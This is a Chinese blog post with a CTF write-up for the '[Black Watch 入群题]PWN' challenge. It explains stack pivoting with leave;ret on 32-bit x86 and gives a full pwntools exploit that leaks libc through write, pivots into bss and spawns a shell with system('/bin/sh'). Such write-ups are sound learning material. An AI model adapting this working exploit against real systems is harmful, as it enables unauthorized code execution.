[Black Watch 入群题]PWN

学习一下栈迁移,以下内容转载于看雪的文章

以32位为例,在汇编中,用call指令来调用一个函数,call 函数会对栈进行一系列操作

push eip+4
push ebp
mov ebp,esp

主要的目的还是用来保护现场,避免执行完函数后堆栈不平衡或找不到之前的入口地址

当调用完函数后,就需要用 leave;ret;来还原现场

leave == mov esp,ebp ; pop ebp;
ret == pop eip 

其中pop eip相当于将栈顶数据给eip,由于ret返回的是栈顶数据,而栈顶地址是由esp的值决定的,esp的值,从leave可以得出是由ebp决定的。所以我们可以通过覆盖ebp的值来控制ret返回地址。两次leave ret即可控制esp为我们想要的地址。由于有pop ebp,会使esp-4,将ebp 覆盖为想要调整的位置-4即可

 

[Black Watch 入群题]PWN为例

 可以看到第二个read的栈只能控制0x20-0x18=0x8个字节,无法构造出较长的ROP链

不过可以用第一个read构造ROP链,且刚好在bss段中,之后栈迁移到该地址执行,后面就是常规的泄露libc来getshell

exp如下

from pwn import *
from LibcSearcher import *

r=remote('node3.buuoj.cn',28463)
#r=process('./spwn')
elf=ELF('./spwn')
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
bss_addr=0x0804A300
leave_ret=0x08048511

payload=p32(write_plt)+p32(main_addr)+p32(1)+p32(write_got)+p32(4)
r.recvuntil("What is your name?")
r.send(payload)

payload1='a'*0x18+p32(bss_addr-4)+p32(leave_ret)
r.recvuntil("What do you want to say?")
r.send(payload1)

write_addr=u32(r.recv(4))
print('[+]write_addr: ',hex(write_addr))
libc=LibcSearcher('write',write_addr)
libc_base=write_addr-libc.dump('write')
system_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump('str_bin_sh')

r.recvuntil("What is your name?")
payload=p32(system_addr)+p32(main_addr)+p32(bin_addr)
r.send(payload)

r.recvuntil("What do you want to say?")
r.send(payload1)

r.interactive()

 

posted @ 2020-03-07 19:45  高诺琪  阅读(1526)  评论(1编辑  收藏  举报